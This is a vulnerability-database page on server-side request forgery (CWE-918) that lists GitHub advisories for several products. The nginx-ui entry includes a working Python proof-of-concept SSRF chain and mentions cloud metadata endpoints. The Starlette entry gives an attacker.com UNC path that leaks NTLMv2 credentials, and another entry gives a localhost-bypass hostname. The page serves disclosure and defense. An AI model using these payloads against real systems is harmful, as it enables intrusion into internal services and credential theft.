CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4606 vulnerabilities reference this CWE, most recent first.
GHSA-WQ2M-PVCJ-FM24
Vulnerability from github – Published: 2025-12-18 15:30 – Updated: 2025-12-18 15:30The Prime Slider – Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.9 via the import_elementor_template AJAX action. This makes it possible for authenticated attackers, with subscriber level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
{
"affected": [],
"aliases": [
"CVE-2025-14277"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-18T13:15:47Z",
"severity": "MODERATE"
},
"details": "The Prime Slider \u2013 Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.9 via the import_elementor_template AJAX action. This makes it possible for authenticated attackers, with subscriber level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.",
"id": "GHSA-wq2m-pvcj-fm24",
"modified": "2025-12-18T15:30:42Z",
"published": "2025-12-18T15:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14277"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3419222/bdthemes-prime-slider-lite"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/069a56a1-ca17-43cc-a51f-51b6111f5b61?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WQP7-X3PW-XC5R
Vulnerability from github – Published: 2026-06-15 20:16 – Updated: 2026-06-15 20:16Summary
When serving static files on Windows, StaticFiles resolves the requested path with os.path.realpath. If a UNC path (such as \\attacker.com\share) reaches the resolver, realpath causes the process to open a connection to the remote host over SMB (port 445). This is a server-side request forgery (SSRF) that leaks the service account's NTLMv2 credentials to the attacker-controlled host, which can then be cracked offline or relayed to other hosts.
Details
StaticFiles.lookup_path() joins the requested path onto the served directory and calls os.path.realpath on the result before checking containment with os.path.commonpath. On Windows, a UNC path is absolute, so os.path.join discards the served directory and realpath resolves the bare UNC path, triggering the outbound SMB connection and NTLM authentication before the containment check rejects the path. The HTTP response is a benign 404, but the credential disclosure has already happened. POSIX systems are not affected.
This only affects the default configuration (follow_symlink=False), which uses os.path.realpath. The follow_symlink=True branch uses os.path.abspath, which performs no I/O.
Impact
Applications running on Windows that serve files with StaticFiles (directly, or via a framework built on Starlette such as FastAPI) in the default configuration are affected. StaticFiles is typically unauthenticated, so any client can trigger the SMB connection and leak the service account's NTLMv2 hash. A secondary impact is discovering internal hosts reachable over SMB by timing responses for valid versus invalid addresses.
Mitigation
Applications not running on Windows are not affected. On Windows, serving static files through a dedicated web server (such as nginx or IIS) instead of StaticFiles avoids the issue. Blocking outbound SMB (port 445) from the application host prevents the credential disclosure even if a UNC path is resolved.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "starlette"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48818"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T20:16:30Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nWhen serving static files on Windows, `StaticFiles` resolves the requested path with [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.realpath). If a UNC path (such as `\\\\attacker.com\\share`) reaches the resolver, `realpath` causes the process to open a connection to the remote host over SMB (port 445). This is a server-side request forgery (SSRF) that leaks the service account\u0027s NTLMv2 credentials to the attacker-controlled host, which can then be cracked offline or relayed to other hosts.\n\n### Details\n\n`StaticFiles.lookup_path()` joins the requested path onto the served directory and calls [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.realpath) on the result before checking containment with [`os.path.commonpath`](https://docs.python.org/3/library/os.path.html#os.path.commonpath). On Windows, a UNC path is absolute, so [`os.path.join`](https://docs.python.org/3/library/os.path.html#os.path.join) discards the served directory and `realpath` resolves the bare UNC path, triggering the outbound SMB connection and NTLM authentication before the containment check rejects the path. The HTTP response is a benign 404, but the credential disclosure has already happened. POSIX systems are not affected.\n\nThis only affects the default configuration (`follow_symlink=False`), which uses [`os.path.realpath`](https://docs.python.org/3/library/os.path.html#os.path.realpath). The `follow_symlink=True` branch uses [`os.path.abspath`](https://docs.python.org/3/library/os.path.html#os.path.abspath), which performs no I/O.\n\n### Impact\n\nApplications running on Windows that serve files with `StaticFiles` (directly, or via a framework built on Starlette such as FastAPI) in the default configuration are affected. `StaticFiles` is typically unauthenticated, so any client can trigger the SMB connection and leak the service account\u0027s NTLMv2 hash. A secondary impact is discovering internal hosts reachable over SMB by timing responses for valid versus invalid addresses.\n\n### Mitigation\n\nApplications not running on Windows are not affected. On Windows, serving static files through a dedicated web server (such as nginx or IIS) instead of `StaticFiles` avoids the issue. Blocking outbound SMB (port 445) from the application host prevents the credential disclosure even if a UNC path is resolved.",
"id": "GHSA-wqp7-x3pw-xc5r",
"modified": "2026-06-15T20:16:30Z",
"published": "2026-06-15T20:16:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-wqp7-x3pw-xc5r"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kludex/starlette"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows"
}
GHSA-WQVR-8G58-79VV
Vulnerability from github – Published: 2022-05-24 16:57 – Updated: 2024-04-04 02:07SalesAgility SuiteCRM 7.10.x 7.10.19 and 7.11.x before and 7.11.7 has SSRF.
{
"affected": [],
"aliases": [
"CVE-2019-13335"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-02T12:15:00Z",
"severity": "CRITICAL"
},
"details": "SalesAgility SuiteCRM 7.10.x 7.10.19 and 7.11.x before and 7.11.7 has SSRF.",
"id": "GHSA-wqvr-8g58-79vv",
"modified": "2024-04-04T02:07:37Z",
"published": "2022-05-24T16:57:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-13335"
},
{
"type": "WEB",
"url": "https://docs.suitecrm.com/admin/releases/7.10.x/#_7_10_20"
},
{
"type": "WEB",
"url": "https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_7"
},
{
"type": "WEB",
"url": "https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WQWW-G3X9-R7FW
Vulnerability from github – Published: 2026-02-03 18:30 – Updated: 2026-02-04 18:30Tiny File Manager through 2.6 contains a server-side request forgery (SSRF) vulnerability in the URL upload feature. Due to insufficient validation of user-supplied URLs, an attacker can send crafted requests to localhost by using http://www.127.0.0.1.example.com/ or a similarly constructed domain name. This may lead to unauthorized port scanning or access to internal-only services.
{
"affected": [],
"aliases": [
"CVE-2025-46651"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-03T18:16:12Z",
"severity": "CRITICAL"
},
"details": "Tiny File Manager through 2.6 contains a server-side request forgery (SSRF) vulnerability in the URL upload feature. Due to insufficient validation of user-supplied URLs, an attacker can send crafted requests to localhost by using http://www.127.0.0.1.example.com/ or a similarly constructed domain name. This may lead to unauthorized port scanning or access to internal-only services.",
"id": "GHSA-wqww-g3x9-r7fw",
"modified": "2026-02-04T18:30:30Z",
"published": "2026-02-03T18:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46651"
},
{
"type": "WEB",
"url": "https://github.com/RobertoLuzanilla/tinyfilemanager-security-advisories/blob/main/CVE-2025-46651.md"
},
{
"type": "WEB",
"url": "https://github.com/prasathmani/tinyfilemanager/blob/master/tinyfilemanager.php#L608"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WR32-99HH-6F35
Vulnerability from github – Published: 2026-04-29 20:54 – Updated: 2026-05-13 16:31Summary
An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.
Details
The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:
- Read the
node_secretfromGET /api/settings(accessible to any authenticated user) - Create a cluster node via
POST /api/nodespointing to any internal URL:
{
"name": "ssrf_node",
"url": "http://127.0.0.1:51820",
"token": "<node_secret>",
"enabled": true
}
- Send any API request with the
X-Node-IDheader set to the created node's ID:
GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1
- The Proxy middleware forwards this request to
http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.
Vulnerable code path:
- internal/middleware/proxy.go — Proxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.
The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.
PoC
import requests
BASE = "http://TARGET:9000"
TOKEN = "<authenticated_jwt_token>"
HDR = {"Authorization": TOKEN}
# Step 1: Get node_secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node_secret = settings["node"]["secret"]
# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
"name": "ssrf",
"url": "http://127.0.0.1:51820", # internal-only port
"token": node_secret,
"enabled": True,
})
node_id = resp.json()["id"]
# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
f"{BASE}/api/settings",
headers={**HDR, "X-Node-ID": str(node_id)},
)
print(resp.status_code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui
This can also target cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/) or any other internal service.
Impact
An authenticated attacker can:
- Access internal services bound to localhost or private networks that are not intended to be externally reachable
- Access cloud metadata endpoints (AWS/GCP/Azure instance metadata) to steal IAM credentials
- Port-scan internal networks by creating nodes pointing to different internal IPs/ports
- Trigger internal-only njs endpoints to escalate privileges (as demonstrated in the companion RCE advisory)
- Bypass network segmentation and firewalls that only restrict inbound traffic
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.3.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44015"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T20:54:54Z",
"nvd_published_at": "2026-05-12T22:16:35Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the `X-Node-ID` header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.\n\n### Details\n\nThe nginx-ui Proxy middleware (`internal/middleware/proxy.go`) intercepts API requests containing an `X-Node-ID` header and forwards them to the URL of the corresponding cluster node. An attacker can:\n\n1. Read the `node_secret` from `GET /api/settings` (accessible to any authenticated user)\n2. Create a cluster node via `POST /api/nodes` pointing to any internal URL:\n```json\n{\n \"name\": \"ssrf_node\",\n \"url\": \"http://127.0.0.1:51820\",\n \"token\": \"\u003cnode_secret\u003e\",\n \"enabled\": true\n}\n```\n3. Send any API request with the `X-Node-ID` header set to the created node\u0027s ID:\n```\nGET /api/settings HTTP/1.1\nAuthorization: \u003ctoken\u003e\nX-Node-ID: 1\n```\n4. The Proxy middleware forwards this request to `http://127.0.0.1:51820/api/settings`, making a server-side request to the internal address.\n\n**Vulnerable code path:**\n- `internal/middleware/proxy.go` \u2014 `Proxy()`: no validation of the node URL; allows `127.0.0.1`, `localhost`, internal IPs, cloud metadata endpoints, etc.\n\nThe node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.\n\n### PoC\n\n```python\nimport requests\n\nBASE = \"http://TARGET:9000\"\nTOKEN = \"\u003cauthenticated_jwt_token\u003e\"\nHDR = {\"Authorization\": TOKEN}\n\n# Step 1: Get node_secret\nsettings = requests.get(f\"{BASE}/api/settings\", headers=HDR).json()\nnode_secret = settings[\"node\"][\"secret\"]\n\n# Step 2: Create SSRF node pointing to internal service\nresp = requests.post(f\"{BASE}/api/nodes\", headers=HDR, json={\n \"name\": \"ssrf\",\n \"url\": \"http://127.0.0.1:51820\", # internal-only port\n \"token\": node_secret,\n \"enabled\": True,\n})\nnode_id = resp.json()[\"id\"]\n\n# Step 3: SSRF \u2014 request is forwarded to http://127.0.0.1:51820/api/settings\nresp = requests.get(\n f\"{BASE}/api/settings\",\n headers={**HDR, \"X-Node-ID\": str(node_id)},\n)\nprint(resp.status_code, resp.text[:200])\n# Response comes from the INTERNAL service, not nginx-ui\n```\n\nThis can also target cloud metadata endpoints (e.g., `http://169.254.169.254/latest/meta-data/`) or any other internal service.\n\n### Impact\n\nAn authenticated attacker can:\n\n- **Access internal services** bound to localhost or private networks that are not intended to be externally reachable\n- **Access cloud metadata endpoints** (AWS/GCP/Azure instance metadata) to steal IAM credentials\n- **Port-scan internal networks** by creating nodes pointing to different internal IPs/ports\n- **Trigger internal-only njs endpoints** to escalate privileges (as demonstrated in the companion RCE advisory)\n- **Bypass network segmentation** and firewalls that only restrict inbound traffic",
"id": "GHSA-wr32-99hh-6f35",
"modified": "2026-05-13T16:31:42Z",
"published": "2026-04-29T20:54:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-wr32-99hh-6f35"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44015"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services"
}
GHSA-WR74-F9QR-G5XW
Vulnerability from github – Published: 2025-05-22 21:30 – Updated: 2025-05-22 21:30SSRF Server Side Request Forgery vulnerabilities exist in ASPECT if administrator credentials become compromisedThis issue affects ASPECT-Enterprise: through 3.; NEXUS Series: through 3.; MATRIX Series: through 3.*.
{
"affected": [],
"aliases": [
"CVE-2024-13957"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-22T19:15:40Z",
"severity": "HIGH"
},
"details": "SSRF Server Side Request Forgery vulnerabilities exist in ASPECT if administrator credentials become compromisedThis issue affects ASPECT-Enterprise: through 3.*; NEXUS Series: through 3.*; MATRIX Series: through 3.*.",
"id": "GHSA-wr74-f9qr-g5xw",
"modified": "2025-05-22T21:30:47Z",
"published": "2025-05-22T21:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13957"
},
{
"type": "WEB",
"url": "https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A0021\u0026LanguageCode=en\u0026DocumentPartId=pdf\u0026Action=Launch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WR7J-7CG5-P3PV
Vulnerability from github – Published: 2024-06-04 21:32 – Updated: 2024-06-04 21:32Prior to 23.2, it is possible to perform arbitrary Server-Side requests via HTTP-based connectors within BeyondInsight, resulting in a server-side request forgery vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-4219"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-04T21:15:35Z",
"severity": "MODERATE"
},
"details": "Prior to 23.2, it is possible to perform arbitrary Server-Side requests via HTTP-based connectors within BeyondInsight, resulting in a server-side request forgery vulnerability.",
"id": "GHSA-wr7j-7cg5-p3pv",
"modified": "2024-06-04T21:32:22Z",
"published": "2024-06-04T21:32:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4219"
},
{
"type": "WEB",
"url": "https://www.beyondtrust.com/trust-center/security-advisories/BT24-05"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-WR7V-68P8-38HW
Vulnerability from github – Published: 2025-02-11 18:31 – Updated: 2025-02-11 18:31Dell UCC Edge, version 2.3.0, contains a Blind SSRF on Add Customer SFTP Server vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Server-side request forgery
{
"affected": [],
"aliases": [
"CVE-2025-22399"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-11T17:15:34Z",
"severity": "HIGH"
},
"details": "Dell UCC Edge, version 2.3.0, contains a Blind SSRF on Add Customer SFTP Server vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Server-side request forgery",
"id": "GHSA-wr7v-68p8-38hw",
"modified": "2025-02-11T18:31:35Z",
"published": "2025-02-11T18:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22399"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000279299/dsa-2025-043-security-update-for-dell-ucc-edge-security-update-for-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-WR82-63QC-G2H8
Vulnerability from github – Published: 2022-05-14 01:04 – Updated: 2022-05-14 01:04The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
{
"affected": [],
"aliases": [
"CVE-2017-9506"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-08-23T19:29:00Z",
"severity": "MODERATE"
},
"details": "The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).",
"id": "GHSA-wr82-63qc-g2h8",
"modified": "2022-05-14T01:04:28Z",
"published": "2022-05-14T01:04:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-9506"
},
{
"type": "WEB",
"url": "https://ecosystem.atlassian.net/browse/OAUTH-344"
},
{
"type": "WEB",
"url": "https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3"
},
{
"type": "WEB",
"url": "https://twitter.com/Zer0Security/status/983529439433777152"
},
{
"type": "WEB",
"url": "https://twitter.com/ankit_anubhav/status/973566620676382721"
},
{
"type": "WEB",
"url": "http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WRF8-P6R2-XW72
Vulnerability from github – Published: 2022-05-24 17:29 – Updated: 2025-05-30 18:30An SSRF issue was discovered in Zoho Application Control Plus before version 10.0.511. The mail gateway configuration feature allows an attacker to perform a scan in order to discover open ports on a machine as well as available machines on the network segment on which the instance of the product is deployed.
{
"affected": [],
"aliases": [
"CVE-2020-15594"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-30T18:15:00Z",
"severity": "MODERATE"
},
"details": "An SSRF issue was discovered in Zoho Application Control Plus before version 10.0.511. The mail gateway configuration feature allows an attacker to perform a scan in order to discover open ports on a machine as well as available machines on the network segment on which the instance of the product is deployed.",
"id": "GHSA-wrf8-p6r2-xw72",
"modified": "2025-05-30T18:30:36Z",
"published": "2022-05-24T17:29:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15594"
},
{
"type": "WEB",
"url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2020-15594"
},
{
"type": "WEB",
"url": "https://excellium-services.com/cert-xlm-advisory/cve-2020-15594"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.